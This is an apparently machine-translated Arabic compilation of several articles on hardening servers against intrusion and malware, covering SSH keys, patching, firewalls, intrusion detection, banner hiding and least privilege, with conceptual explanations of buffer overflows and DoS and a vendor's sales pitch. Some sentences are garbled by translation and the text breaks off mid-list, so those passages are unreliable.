تكوين خادم الحماية من الفيروسات. نشر الحماية من الفيروسات من خلال Kaspersky Security Center. التحديث عن بعد لقواعد بيانات مكافحة الفيروسات

من المستحيل حماية الخادم من الوصول الخارجي مرة واحدة وإلى الأبد ، لأنه يتم اكتشاف ثغرات جديدة كل يوم وتظهر طرق جديدة لاختراق الخادم. سنتحدث عن حماية الخوادم من الوصول غير المصرح به في هذه المقالة.

يمكن أن تصبح خوادم أي شركة عاجلاً أم آجلاً هدفًا للقرصنة أو هجوم الفيروسات. عادةً ما تكون نتيجة مثل هذا الهجوم فقدان البيانات أو الإضرار بالسمعة أو الضرر المالي ، لذلك يجب معالجة مشكلات أمان الخادم في المقام الأول.

يجب أن يكون مفهوما أن الحماية ضد القرصنة على الخادم هي مجموعة من الإجراءات ، بما في ذلك تلك التي تتطلب مراقبة مستمرة لتشغيل الخادم والعمل على تحسين الحماية. من المستحيل حماية الخادم من الوصول الخارجي مرة واحدة وإلى الأبد ، لأنه يتم اكتشاف ثغرات جديدة كل يوم وتظهر طرق جديدة لاختراق الخادم.

سنتحدث عن حماية الخوادم من الوصول غير المصرح به في هذه المقالة.

طرق وطرق حماية الخوادم من الوصول غير المصرح به

الحماية المادية للخادم

الحماية المادية. من المستحسن أن يكون الخادم موجودًا في مركز بيانات آمن ، وغرفة مغلقة ومحروسة ، ويجب ألا يكون لدى الغرباء إمكانية الوصول إلى الخادم.

قم بإعداد مصادقة SSH

عند إعداد الوصول إلى الخادم ، استخدم مصادقة مفتاح SSH بدلاً من كلمة المرور ، نظرًا لأن هذه المفاتيح أكثر صعوبة ، وفي بعض الأحيان من المستحيل اختراقها باستخدام بحث القوة الغاشمة.

إذا كنت تعتقد أنك لا تزال بحاجة إلى كلمة مرور ، فتأكد من الحد من عدد محاولات إدخالها.

انتبه إذا رأيت رسالة مثل هذه عند تسجيل الدخول:

آخر تسجيل دخول فاشل: الثلاثاء 28 سبتمبر 12:42:35 MSK 2017 من 52.15.194.10 على ssh: notty
كانت هناك 8243 محاولة تسجيل دخول فاشلة منذ آخر تسجيل دخول ناجح.

قد يشير ذلك إلى أن خادمك قد تم اختراقه. في هذه الحالة ، لتكوين أمان الخادم ، قم بتغيير منفذ SSH ، أو قم بتقييد قائمة عناوين IP التي يمكن الوصول إلى الخادم من خلالها ، أو قم بتثبيت برنامج يقوم تلقائيًا بحظر الأنشطة المتكررة والمريبة بشكل مفرط.

قم بتثبيت آخر التحديثات بانتظام

لضمان حماية الخادم ، قم بتثبيت أحدث التصحيحات والتحديثات لبرنامج الخادم الذي تستخدمه - نظام التشغيل ، برنامج Hypervisor ، خادم قاعدة البيانات في الوقت المحدد.

يُنصح بالتحقق من التصحيحات الجديدة والتحديثات والأخطاء / الثغرات الأمنية المبلغ عنها كل يوم لمنع الهجمات التي تستغل ثغرات يوم الصفر. للقيام بذلك ، اشترك في الأخبار من شركة تطوير البرمجيات ، وتابع صفحاتها على الشبكات الاجتماعية.

حماية كلمات المرور

إلى حد بعيد واحدة من أكثر الطرق شيوعًا للوصول إلى الخادم هي كسر كلمة مرور الخادم. لذلك ، اتبع التوصيات المعروفة ، ولكن مع ذلك ، ذات الصلة حتى لا تترك الخادم بدون حماية:

• لا تستخدم كلمات مرور يسهل تخمينها ، مثل اسم الشركة ؛
• إذا كنت لا تزال تستخدم كلمة المرور الافتراضية لوحدة تحكم المشرف ، فقم بتغييرها على الفور ؛
• يجب أن تكون كلمات المرور للخدمات المختلفة مختلفة ؛
• إذا كنت بحاجة إلى مشاركة كلمة المرور الخاصة بك مع شخص ما ، فلا ترسل عنوان IP واسم المستخدم وكلمة المرور في نفس البريد الإلكتروني أو رسالة المراسلة ؛
• يمكنك إعداد التحقق بخطوتين لتسجيل الدخول إلى حساب المسؤول.

جدار الحماية

• تأكد من تهيئة الخادم وتشغيله طوال الوقت.
• حماية حركة المرور الواردة والصادرة.
• تتبع المنافذ المفتوحة ولأي غرض ، لا تفتح أي شيء غير ضروري لتقليل عدد الثغرات الأمنية المحتملة لاختراق الخادم.

على وجه الخصوص ، يعد جدار الحماية مفيدًا جدًا في حماية الخادم من هجمات ddos ​​، لأن يمكنك إنشاء قواعد جدار حماية للحظر بسرعة وإضافة عناوين IP التي يأتي منها الهجوم ، أو منع الوصول إلى تطبيقات معينة باستخدام بروتوكولات معينة.

المراقبة وكشف التسلل

• تقييد البرامج والخدمات التي تعمل على الخادم الخاص بك. تحقق بشكل دوري من كل ما تقوم بتشغيله ، وإذا تم العثور على أي عمليات غير مألوفة ، فاحذفها على الفور وابدأ في البحث عن الفيروسات.
• تحقق دوريًا من علامات العبث. قد يتم إثبات الاختراق من خلال حسابات مستخدمين جديدة لم تقم بإنشائها أو نقلها أو حذفها /etc/syslog.confالملفات المحذوفة / الخ / الظلو / etc / passwrd.
• راقب الخادم الخاص بك ، وراقب سرعته ومعدلاته الطبيعية ، حتى تتمكن من ملاحظة الانحرافات ، على سبيل المثال ، عندما يصبح التحميل على الخادم أكثر من المعتاد.

استخدام تشفير VPN و SSL / TLS

إذا كان الوصول عن بعد إلى الخادم مطلوبًا ، فيجب السماح به فقط من عناوين IP معينة ويتم ذلك عبر VPN.

يمكن أن تكون الخطوة التالية في ضمان الأمان هي إعداد SSL ، والذي لن يقوم فقط بتشفير البيانات ، ولكن أيضًا يتحقق من هوية المشاركين الآخرين في البنية التحتية للشبكة عن طريق إصدار الشهادات المناسبة لهم.

فحص أمان الخادم

سيكون من الجيد التحقق بشكل مستقل من أمان الخادم باستخدام طريقة pentest ، أي محاكاة الهجوم للعثور على نقاط الضعف المحتملة والقضاء عليها في الوقت المناسب. من المستحسن إشراك المتخصصين في هذا أمن المعلوماتومع ذلك ، يمكن إجراء بعض الاختبارات بشكل مستقل باستخدام برامج اختراق الخادم.

ما الذي يهدد الخوادم بخلاف القرصنة

يمكن أن يتعطل الخادم لعدد من الأسباب بخلاف التعرض للاختراق. على سبيل المثال ، قد تكون إصابة ببرامج ضارة أو مجرد عطل مادي لأحد المكونات.

لذلك ، يجب أن تتضمن إجراءات حماية الخادم ما يلي:

• تركيب وتحديث برامج حماية السيرفر - مضادات الفيروسات.
• نسخ البيانات المشفرة بانتظام مرة واحدة على الأقل في الأسبوع ، لأنه وفقًا للإحصاءات ، فإن محركات الأقراص الثابتة للخادم هي في المقام الأول من حيث تواتر الأعطال. تأكد من تخزين النسخة الاحتياطية في بيئة آمنة ماديًا.
• ضمان عدم انقطاع التيار الكهربائي لغرفة الخادم.
• الوقاية المادية في الوقت المناسب للخوادم ، بما في ذلك تنظيفها من الغبار واستبدال المعجون الحراري.

تخبرنا خبرة متخصصي Integrus أن أفضل حماية ضد مثل هذه التهديدات هي تطبيق أفضل الممارسات في مجال أنظمة حماية الخادم.

لضمان أمان خوادم عملائنا ، نستخدم مجموعة من الأدوات: جدران الحماية ، ومكافحة الفيروسات ، وتقنيات إدارة الأحداث / الأمان (SIM / SEM) ، وتقنيات كشف التسلل / الحماية (IDS / IPS) ، وتقنيات تحليل سلوك الشبكة (NBA) ، بالطبع خوادم الصيانة الوقائية المنتظمة وترتيب غرف الخوادم الآمنة على أساس تسليم المفتاح. يتيح لك ذلك تقليل مخاطر القرصنة أو فشل الخادم لأسباب أخرى.

نحن على استعداد لإجراء تدقيق أمني لخوادم شركتك ، واستشارة المتخصصين ، وتنفيذ جميع أنواع العمل لإعداد حماية معدات الخادم.

كيفية تنظيم دفاع شبكات الكمبيوتر بشكل صحيح من البرامج الضارة.

هذه المقالة موجهة إلى مسؤولي النظام المبتدئين.

من خلال الحماية من الفيروسات ، أعني الحماية من أي نوع من البرامج الضارة: الفيروسات ، أحصنة طروادة ، مجموعات الجذر ، الأبواب الخلفية ، ...

خطوة واحدة للحماية من الفيروسات - قم بتثبيت برنامج مكافحة الفيروسات على كل كمبيوتر في الشبكة وقم بتحديثه يوميًا على الأقل. المخطط الصحيح لتحديث قواعد بيانات مكافحة الفيروسات: يذهب خادمان إلى خادمان للحصول على التحديثات وتوزيع التحديثات على جميع أجهزة الكمبيوتر على الشبكة. تأكد من تعيين كلمة مرور لتعطيل الحماية.

برامج مكافحة الفيروسات لها عيوب كثيرة. العيب الرئيسي هو أنهم لا يصابون بالفيروسات المكتوبة حسب الطلب والتي لا تستخدم على نطاق واسع. العيب الثاني هو أنها تقوم بتحميل المعالج وتستهلك ذاكرة على أجهزة الكمبيوتر ، بعضها أكثر (كاسبيرسكي) ، والبعض الآخر أقل (إيسيت Nod32) ، وهذا يجب أن يؤخذ في الاعتبار.

يعد تثبيت برنامج مكافحة الفيروسات طريقة إلزامية ولكنها غير كافية للحماية من تفشي الفيروسات ، وغالبًا ما يظهر توقيع الفيروس في قواعد بيانات مكافحة الفيروسات في اليوم التالي بعد توزيعه ، وفي يوم واحد يمكن للفيروس أن يشل عمل أي شبكة كمبيوتر.

عادة ، يتوقف مسؤولو النظام عند الخطوة 1 ، والأسوأ من ذلك ، أنهم لا يكملونها أو لا يتابعون التحديثات ، وعاجلاً أم آجلاً لا تزال العدوى تحدث. أدناه سأدرج خطوات مهمة أخرى لتعزيز الحماية من الفيروسات.

الخطوة 2 سياسة كلمة المرور. يمكن أن تصيب الفيروسات (أحصنة طروادة) أجهزة الكمبيوتر على الشبكة عن طريق تخمين كلمات المرور للحسابات القياسية: الجذر ، والمسؤول ، والمسؤول ، والمسؤول. استخدم دائمًا كلمات مرور معقدة! بالنسبة للحسابات التي لا تحتوي على كلمات مرور أو بكلمات مرور بسيطة ، يجب فصل مسؤول النظام بإدخال مطابق في كتاب العمل. بعد 10 محاولات لإدخال كلمة مرور غير صحيحة ، يجب حظر الحساب لمدة 5 دقائق للحماية من القوة الغاشمة (تخمين كلمة المرور عن طريق التعداد البسيط). يوصى بشدة بإعادة تسمية حسابات المسؤول المضمنة وتعطيلها. يجب تغيير كلمات المرور بشكل دوري.

3 خطوة. تقييد حقوق المستخدم. ينتشر فيروس (طروادة) عبر الشبكة نيابة عن المستخدم الذي قام بتشغيله. إذا كانت حقوق المستخدم محدودة: لا يوجد وصول إلى أجهزة الكمبيوتر الأخرى ، ولا توجد حقوق إدارية لجهاز الكمبيوتر الخاص به ، فلن يتمكن حتى الفيروس قيد التشغيل من إصابة أي شيء. ليس من غير المألوف أن يصبح مسؤولو النظام أنفسهم الجناة لانتشار الفيروس: لقد أطلقوا مفتاح المسؤول الرئيسي وذهب الفيروس لإصابة جميع أجهزة الكمبيوتر على الشبكة ...

4 خطوة. التثبيت المنتظم لتحديثات الأمان. هذا هو عمل شاقلكن يجب أن يتم ذلك. تحتاج إلى تحديث ليس فقط نظام التشغيل ، ولكن أيضًا جميع التطبيقات: DBMS وخوادم البريد.

الخطوة الخامسة تقييد طرق اختراق الفيروسات. تدخل الفيروسات إلى الشبكة المحلية للمؤسسة بطريقتين: من خلال الوسائط القابلة للإزالة وعبر الشبكات الأخرى (الإنترنت). من خلال رفض الوصول إلى USB و CD-DVD ، فإنك تحجب طريقة واحدة تمامًا. بتقييد الوصول إلى الإنترنت ، فإنك تحجب المسار الثاني. هذه الطريقة فعالة للغاية ، ولكن من الصعب تنفيذها.

6 خطوة. جدران الحماية (ITU) ، هي أيضًا جدران حماية (جدران حماية) ، وهي أيضًا جدران حماية. يجب تثبيتها على حدود الشبكة. إذا كان جهاز الكمبيوتر الخاص بك متصلاً بالإنترنت مباشرةً ، فيجب تمكين الاتحاد الدولي للاتصالات. إذا كان الكمبيوتر متصلاً فقط بشبكة محلية (LAN) ووصل إلى الإنترنت والشبكات الأخرى من خلال الخوادم ، فليس من الضروري تمكين الاتحاد الدولي للاتصالات على هذا الكمبيوتر.

الخطوة 7 تقسيم شبكة مؤسسة إلى شبكات فرعية. من الملائم قطع الشبكة وفقًا للمبدأ: قسم واحد في شبكة فرعية ، قسم آخر في آخر. يمكن تقسيم الشبكات الفرعية على الطبقة المادية (SCS) ، في طبقة ارتباط البيانات (VLAN) ، في طبقة الشبكة (الشبكات الفرعية التي لا تتقاطع مع عناوين IP).

الخطوة 8 يحتوي Windows على أداة رائعة لإدارة أمان مجموعات كبيرة من أجهزة الكمبيوتر - هذه سياسات المجموعة (GPOs). من خلال GPO ، يمكنك تكوين أجهزة الكمبيوتر والخوادم بحيث تصبح الإصابة بالبرامج الضارة وتوزيعها شبه مستحيلة.

الخطوة 9 الوصول إلى المحطة. قم برفع 1-2 خوادم طرفية على الشبكة والتي من خلالها سيقوم المستخدمون بالوصول إلى الإنترنت وستنخفض احتمالية إصابة أجهزة الكمبيوتر الشخصية الخاصة بهم إلى الصفر.

الخطوة 10 متابعة كافة العمليات والخدمات التي تعمل على أجهزة الكمبيوتر والخوادم. يمكنك إجراء ذلك بحيث يتم إخطار مسؤول النظام عند بدء عملية غير معروفة (خدمة). البرامج التجارية التي يمكنها القيام بذلك تكلف الكثير ، ولكن في بعض الحالات تكون التكاليف مبررة.

في هذا المقال أرغب في جمع بعض أنواع الهجمات على الخوادم ووسائل حماية الخادم من المتسللين. تمت كتابة الكثير من الكتب والمقالات حول موضوع الأمن. ينصب التركيز في هذه المقالة على الأخطاء الأساسية للمسؤولين والحلول للقضاء عليها. بعد قراءة هذا المقال والتحقق من الخادم الخاص به ، لن يتمكن المسؤول أيضًا من النوم بهدوء ، يمكنه فقط أن يقول إنني تجاوزت "الحد الأدنى من المرشح".

تذكر المديرين ثلاثة أمثال ،
لا! من الأفضل طباعتها وتعليقها في مكان عملك أمام عينيك:
"الأمن هو عملية",
"عندما لا يكون للمسؤول ما يفعله ، فهو منخرط في الأمن",
"يتم تعريف الأمان من خلال الرابط الأضعف"
تهدف المقالة إلى مسؤولي * nix + Apache + PHP + Perl + (MySQL | PostgreSQL) وحماية الخوادم من الهجمات عن بُعد ، بالنسبة للمسؤولين الآخرين ، آمل أن تكون المقالة مصدرًا للتفكير.
تحتوي الكتب المختلفة على تصنيفات مختلفة لهجمات القراصنة ، وسأقدم قسمي الخاص إلى فئتين شرطيتين من جميع الهجمات ، وقم بفك تجميعها:

• الهجوم على الخدمات المعرضة للخطر والتي يمكن الوصول إليها عبر الإنترنت

لفهم تقسيمي ، تخيل أن هناك نصًا خياليًا يهاجم Apache عن بُعد على المنفذ 80 ، ونتيجة للهجوم ، يتم إيقاف تشغيل Apache وتُترك بدون موقعك ، حيث لا يوجد أحد يمنحك صفحات الويب. تم إرسال 1000 حرف إلى خادم بريد الإرسال الخاص بك كمعامل إلى VRFY بدلاً من اسم مستخدم قصير ، ولم يتوقع Sendmail حدوث ذلك وتم إغلاقه مما تركك بلا بريد. المعنى العام لهجمات هذه الفئة الشرطية هو استغلال بعض ثغرات التطبيقات. وهناك ثلاث طرق -

• path1) سيتعطل التطبيق ولن تكون الخدمة متاحة ، حالة DoS ؛
• المسار 2) سيبدأ التطبيق في التقاط الموارد ، وبعد استنفادها ، سيقوم بعمل DoS ؛
• path3) سيتم تغذية التطبيق برمز قشرة وسيتم تنفيذ كود المهاجم ؛

هذه كلها هجمات على الخدمة (العنصر 1) ويتم التعامل معها بطريقة واحدة فقط: يتعلم المسؤول على الفور من المطور عن وجود ثغرة أمنية ويقوم بتحديث هذا البرنامج.

الهجوم على النقطة 2 هو عندما تسمح خدمة ديناميكية مطبقة في بعض لغات البرمجة باستلام المعلمات وتنفيذها دون التحقق منها. على سبيل المثال ، باستخدام متصفح ، فإن المهاجم ، والزحف عبر موقع Apache ، والبحث عن الثغرات الأمنية في الموقع نفسه واستغلالها ، يحصل على ما يريد. مكتوبًا بلغة Tcl ، يتلقى الروبوت الخاص بإدارة قناة خادم IRC طلبات من المستخدم (رقم النكتة الجديدة ، وتاريخ اليوم لعرض الطقس) والمتسلل ، الذي يعيد إنشاء كود برنامج الروبوت (هندسة عكسية) ) ، ينشئ الطلبات التي لم يأخذها مؤلف الروبوت في الاعتبار.

اسأل كيف يتم ذلك؟ فأنت بالتأكيد بحاجة إلى هذه المقالة. بطريقة أو بأخرى ، سيتم رسم كل شيء أدناه.

هجوم على الخدمات الضعيفة والخادم نفسه

في هذا القسم ، قمت بتضمين جميع الهجمات التي يقع تأثيرها على النظام والخدمات. غالبًا ما تكون مثل هذه الهجمات ممكنة من أخطاء في تنفيذ البرنامج ، مثل فيضان المخزن المؤقت (تجاوز سعة المخزن المؤقت). باختصار ، يبدو الأمر على هذا النحو ، دعنا نقول في خادم بروتوكول نقل الملفات المكتوب بشكل سيء وجود مصفوفة (مخزن مؤقت) لاسم مستخدم لعدد معين من الأحرف (على سبيل المثال ، 10) ، ويتلقى خادم بروتوكول نقل الملفات هذا 100 حرف من شخص مريض. - إذا لم يكن مثل هذا الموقف في كود خادم بروتوكول نقل الملفات محددًا ، يحدث تجاوز سعة المخزن المؤقت.

إذن ما هو تجاوز المخزن المؤقت المحلي المفيد للقراصنة؟ من الممكن الكتابة فوق عنوان المرسل بكود ضار. يسمح لك هذا عن بُعد بتنفيذ تعليمات برمجية عشوائية على النظام الهدف ، محليًا ، إذا كان البرنامج يعمل كجذر ، فسيتيح لك ذلك الحصول على امتيازات مسؤول النظام. يُطلق على الكود الذي يتسبب في تجاوز سعة المخزن المؤقت وتنفيذ إجراءات للمتسلل اسم shell الكود: إن كتابة كود القشرة ليس بالمهمة السهلة ، ويتطلب معرفة لغة التجميع من المخترق ، مما يدل على الاحتراف في هذا المجال.

الحماية من الهجمات على الخدمات الضعيفة والخادم نفسه

• تحديث. من الضروري معرفة كيفية تحديث النظام بأكمله وبالتالي تكون قادرًا على ذلك
  "قم ببناء العالم والنواة" لـ * nix ، قم بالتحديث عبر نظام حزمة Linux وكن قادرًا على النقر فوق الزر Update في Windows Update لـ MS Windows المرخص. يجب أن يكون مسؤولو FreeBSD قادرين على تثبيت البرامج باستخدام المنافذ. بهذه الطريقة سوف تبحر مع المطورين وليس ضدهم.

  يحتاج مسؤولو MS Windows إلى التعود على تنسيق توزيع MSI واستخدامه في كثير من الأحيان ، وهو ما توصي به Microsoft بشدة ويدعم تحديث الحزمة القديمة بالحزمة الجديدة. مهما كان ما تفعله على الخادم الخاص بك ، اسأل نفسك عما إذا كان هناك إصدار جديد من هذا البرنامج ، ما مدى سهولة تحديثه؟ يجب عليك إنشاء حل تتحكم فيه بالكامل ، نعم ، هناك مشاريع لها تطورات أو تصحيحات خاصة بها ، ولكن إذا كانت تطوراتك تتطلب تجميد التطبيقات التي تحتاجها في إصدار معين ولا يمكنك تطبيق التصحيحات الخاصة بك على نظام جديد- سعر جيد لمثل هذا القرار!

  سأقوم باستطرادي غنائي هنا وأخبرك كيف اضطررت إلى تحطيم نفسي. بعد قراءة المقالات على الإنترنت التي تبدأ عادةً بهذه الطريقة ، "نزِّل المصدر وضعه ثم ثبته". إذن ، ماذا بعد؟ كيف ستقوم بتثبيت الإصدار الجديد؟ هل تريد الاحتفاظ بالإصدار القديم حتى تتمكن من تثبيت (de | un) فيه؟ وفي الجديد جعل التثبيت مرة أخرى؟ تم طرح هذه الأسئلة من قبل صديقي دميتري دوبروفين عندما بدأنا في تعلم FreeBSD. بدأت أفهم أنه كان على حق ، وعلى الأقل بالنسبة لـ Free ، فإن هذا المسار غير مناسب ، ومن خلال عدم اتباع مسار مطوري FreeBSD ، جعلت الأمور أكثر صعوبة على نفسي فقط.

  الآن ، بعد إتقان FreeBSD ، عندما يقوم أمران بتنزيل مصادر جديدة لـ Free kernel والنظام بأكمله ، يتم إنشاء أمران عالم جديدوالنواة ، ثم يتم تحديث المنافذ والتطبيقات في النظام ، تبدأ في فهم قوة أنظمة * nix. من الصعب نقل الفخر الذي تشعر به عندما تقوم بترقية خادم مع FreeBSD من فرع قديم إلى آخر حالي ، وإعادة بناء عالم النظام ، عندما يقوم النظام بتجميع نفسه من مصادر جديدة (يبدو أن Munchausen شد نفسه من الشعر) وكل شيء التي عملت قبل الترقية تعمل أيضًا "بدون ملف".

  كما فهمت بالفعل ، يجب عليك الاشتراك في قوائم بريدية للأمان من مطوري البرامج التي تدعم أعمالك وتحديثها بشكل دوري. تجديد كل شيء وكل شيء يجب إتقانه ووضعه على القضبان.

• ضبط الأمان. لا يتم تكوين معظم أنظمة تشغيل الخوادم بشكل كافٍ ، افتراضيًا ، للعمل في بيئة "كيميائية" قاسية للإنترنت. لكي "لا يغش" المتسللون على الخادم الخاص بك ، تحتاج إلى إجراء ضبط الأمان ، أي قراءة توصيات الشركة المصنعة لنظام التشغيل بشأن الأمان. يمكن لمديري أنظمة * nix الاتصال بـ man security ، وبعد قراءة نصائح المطورين ، جعل القصة الخيالية حقيقة. ولكن مهما كان نظام التشغيل ، فأنت بحاجة إلى اختبار تشغيل الخادم والخدمات بعناية بعد ضبط الأمان.
• جدار الحماية. جدار حماية تم تكوينه قمت بفحصه شخصيًا باستخدام الماسحات الضوئية للمنافذ nmap والماسحات الضوئية للثغرات الأمنية ، إذا كان هناك ناتج من هذه البرامج ، فهل تفهمون جميعًا ما هو على المحك؟ عند إعداد جدار حماية ، تذكر أن هناك طرقًا لتجاوز قواعده. على سبيل المثال ، هناك شبكة منطقة محلية محمية بجدار ناري ، من خلال تعيين علامة حظر تجزئة الحزمة ، من الممكن ، في مواقف معينة ، الوصول إلى الوجهة في شبكة المنطقة المحلية. أو خطأ شائع من قبل المسؤول ، الثقة المفرطة في الحزم الصادرة من الخادم الخاص به.

  تخيل موقفًا حقيقيًا ، يحاول رمز العدو بدء اتصال بمضيف مالك المتسلل ، ولديك قاعدة في جدار الحماية "يُسمح لي بكل شيء على الإنترنت." عند إنشاء قواعد جدار الحماية ، يجب أن تفهم تمامًا الصورة الكاملة لاتصالات الشبكة لخدماتك بين أنفسهم والعملاء البعيدين.

• نظام كشف التسلل. يمكن تخيل جدار الحماية كجدران حجرية بالقرب من قلعة الفارس. منتصبة مرة واحدة وتجلس بالداخل - جافة ومريحة. ولكن ماذا لو قام شخص ما بالفعل باختبار قوة جدران المدفع؟ ربما تحتاج بالفعل إلى النظر خارج القلعة والتراكم على شخص ما؟ لمعرفة ما يحدث خلف جدران القلعة ، خارجها ، يجب أن يكون لديك نظام كشف التسلل (IDS) على الخادم. إذا كان لديك مثل هذا النظام بناءً على الحزمة التي تريدها ، فعندئذٍ إذا بدأ شخص ما في إطلاق النار من مسدس nmap ، فستكون على دراية ، وسيكون المهاجم أيضًا على دراية بـ "ما تعرفه".
• تحليل المواقف غير المعيارية. في العديد من السجلات في النظام ، غالبًا ما تومض النقوش "خطأ: عدم فتح الملف / etc / passwd" أو "تم رفض الوصول". هذه عبارة عن أجراس صغيرة ترن حول تطبيق تم تكوينه بشكل غير صحيح ولا يمكنه قراءة شيء ما ، في مكان ما ، أو ربما ليس جرسًا ، ولكنه إنذار يدق ناقوس الخطر حول أحد المتطفلين الذي يوجد في منتصف الطريق.

  في أي حال ، يجب أن يكون المسؤول على دراية بمثل هذه الأشياء. لتسهيل عمل المسؤول ، تم إنشاء برامج من شأنها تحليل السجلات بحثًا عن ظهور عبارات مثيرة للاهتمام وإرسال تقرير إلى المسؤول عن طريق البريد. لا تحتقر مثل هذه الفرصة ، فهذه البرامج يمكن مقارنتها بالحراس الذين يتفقدون طريقًا موثوقًا به ، ولكن هل يتصرف الجميع وفقًا لما هو مقرر؟

• قم بإزالة إصدارات البرامج. إزالة اللافتات من خدماتك. لا ، ليست تلك الشعارات التي تعرضها على موقعك ، ولكن تلك السطور التي تعطيها برامجك في التحيات عند الاتصال أو في إخراج الخطأ. ليست هناك حاجة للتألق مع إصدارات برامجك ، يبحث المتسللون في الإنترنت عن البرامج المتاحة التي تستغل هذه الثغرة أو تلك (الثغرات - الاستغلال) من خلال الإصدارات.

  لا يوجد حل واحد هنا ، على سبيل المثال ، إذا قمت بتثبيت برنامج معين من المنافذ ، فلا تكتب اجعل التثبيت نظيفًا ، لذلك بدونك سيتم تنزيل كل شيء وترجمته وتثبيته. من الأفضل القيام بجلب ؛ جعل استخراج ثم انتقل إلى الدليل الفرعي للملفات وهناك يمكنك تصحيح إصدار البرنامج في المصادر أو تمريره كإصدار آخر ثم جعل التثبيت نظيفًا فقط.

  Apache غني بالمعلومات في غير محله ولا يزال يتألق مع إصدارات النظام ، PHP ، Perl ، OpenSSL. يتم تعطيل العار عن طريق تحديد التوجيهات في httpd.conf ServerSignature Off ServerTokens Prod. على الإنترنت ، يمكنك العثور على مساعدة في استبدال اللافتات بأي برنامج. الهدف هو نفسه - حرمان المهاجم من المعلومات القيمة. بالنظر إلى قائمة الخدمات المتاحة من الإنترنت ، اسأل نفسك عما إذا كانت تقدم الكثير من المعلومات عن نفسها والمعلومات التي تخزنها.

  على سبيل المثال ، يمكن أن يسمح ارتباط خادم DNS "بنقل المنطقة" وستتوفر أجهزة الكمبيوتر الخاصة بك مع IP وأسماء المجال الخاصة بهم للجميع ، وهو أمر سيء. تحقق من الخادم الخاص بك باستخدام العديد من الماسحات الضوئية واقرأ نتائجها بعناية. عند استبدال شعار البرنامج ، أنصحك بإدخال ليس نصًا عشوائيًا ، ولكن تحذيرًا بشأن المسؤولية وأنه يتم تسجيل الإجراءات. نظرًا لوجود حوادث تم فيها إطلاق سراح أحد المتطفلين في قاعة المحكمة ، لأنه كان هناك نقش على خادم FTP المخترق "مرحبًا! مرحبًا!".

• قاعدة الحد الأدنى من المتطلبات. تقليل الخدمات المتاحة للإنترنت. قم بتعطيل ما لا تحتاج إليه ، حيث لا يمكنك اختراق ما تم تعطيله. الخطأ الشائع ، على سبيل المثال ، هو عندما يتم تكوين خادم MySQL مقترن مع Apache على نفس الجهاز بحيث يمكن الوصول إليه عن بُعد على المنفذ الافتراضي الخاص به 3306. لماذا؟ أعط الأمر netstat -na | grep استمع وامنح نفسك الإجابة: هل تعرف البرامج التي تستخدم أي واجهة وأي منفذ؟ هل أنت المتحكم؟ حسنًا إذا كان الأمر كذلك.
• العديد من كلمات المرور القوية والمختلفة. في كثير من الأحيان في مقاطع الفيديو حول قصص القرصنة أو المتسللين حول القرصنة ، تومض العبارة "من الجيد أن يكون لدى المسؤول كلمة مرور واحدة للوحة الإدارة ، والتي ارتفعت أيضًا إلى ssh و ftp". آمل ألا يكون هذا عنك. ومن هنا جاءت القاعدة: يجب أن تكون كلمات المرور للخدمات المختلفة مختلفة وأن تتكون من 16 حرفًا على الأقل. دعهم يكتبون على قطعة من الورق إذا كنت تخشى أن تنسى (في هذا المكان يقتلني المتخصصون الأمنيون) ، لكن هذا أفضل من فك تشفير كلمة المرور الخاصة بك في بضع دقائق بواسطة مهاجم عن بُعد ، نظرًا لطولها الصغير جعلت كلمة المرور والتشابه مع كلمة القاموس من الممكن.

  من السهل القيام بكلمات مرور مختلفة للخدمات المختلفة إذا كانت الخدمات تسمح ليس كمستخدمي النظام في قاعدة البيانات / etc / passwd ، ولكن ككلمات افتراضية في قواعد بياناتهم المستوية أو قواعد بيانات DBMS. لا تخزن كلمات المرور على الخوادم في ملف password.txt لجميع الموارد التي يمكنك الوصول إليها بصفتك مشرفًا.

• التقييد. يجب تشغيل جميع خدماتك على الخادم من حسابات (حساب) محدودة مختلفة وألا يتم تشغيلها مطلقًا من حساب الجذر. صدقني ، إذا حصلوا على امتياز التصعيد من حساب محدود إلى حالة الجذر (uid = 0 ، gid = 0) ، فسيتم حفظك بسبب الغياب في حسابك نظام محدثالثقوب المعروفة.

  بالمناسبة ، ينسى العديد من المسؤولين مثل هذا الشيء ، فلماذا ، على سبيل المثال ، يجب أن يكون لحسابات تشغيل Apache و MySQL حق الوصول إلى shell! بعد كل شيء ، يمكن تعطيل هذا وبدلاً من شل تحديد / bin / false. حسنًا ، بصراحة ، تحقق من حساباتك للبرامج الموجودة على خادم التقارير الخاص بك وأخبرني إذا كنت مخطئًا. في قواعد بيانات SQL الخاصة بك ، حدد الحسابات بالحد الأدنى من الامتيازات المطلوبة. لا تمنح امتيازات FILE عندما يتم استدعاء SELECT فقط.

• الجميع في السجن!تعرف على كيفية العمل مع صناديق الحماية (sandbox) أو السجون (السجن) وتشغيل التطبيقات في هذه الغرف المعزولة ، وهذا سيجعل من الصعب اختراق الخادم بأكمله. إذا كنت تستخدم الظاهرية ، فيمكنك نشر الخدمات عبر أنظمة تشغيل الضيف المختلفة.
• دفاع متعدد الطبقات.من الممكن حظر شيء ما بعدة طرق في أماكن مختلفة - افعل ذلك. لا تفكر أبدًا - لقد حرمت ذلك هنا ، هناك لحظر ما لا لزوم له.

تعرف على المزيد حول الهجمات على الخدمات المعرضة للخطر والخادم نفسه.

• هجوم DoS (رفض الخدمة) - هجوم هدفه سد أي مورد خادم محدود (قناة الإنترنت ، ذاكرة الوصول العشوائي ، المعالج ، إلخ) ، حتى لا يتمكن الخادم من خدمة المستخدمين الشرعيين. من الناحية المجازية ، تخيل أن دخيلًا اتصل بك في المنزل وكان صامتًا على الهاتف ، واستمر هذا طوال المساء. لقد سئمت من كل هذا وقمت بإيقاف تشغيل الهاتف ، وفي الصباح اكتشفت أنك فاتتك مكالمة مهمة من رئيسك في العمل. إليك تشبيه حقيقي لهجوم DoS.

  في الحياة الواقعية ، غالبًا ما تبدو DoS على هذا النحو ، نظرًا لوجود خطأ في البرنامج ، فإن استخدام المعالج يقفز ويبقى بنسبة 100٪ لفترة طويلة ، ويستغل المهاجم بشكل دوري هذه الثغرة في البرنامج. يمكن أن ينفد تطبيق مكتوب بشكل سيئ من ذاكرة الوصول العشوائي. أو "قنبلة بريد" على شكل ملف مضغوط بشدة في الأرشيف به العديد من الأحرف [مسافة] ، والتي سيتم تفريغها لفحصها بواسطة برنامج مكافحة الفيروسات وسيتجاوز الملف الضخم الذي تم فك حزمه قسم القرص الثابت على الخادم و / و يتسبب في إعادة تشغيل الخادم.

  حماية هجوم DoS:

  • تحديث برنامج يتم التلاعب به من أجل هجوم DoS
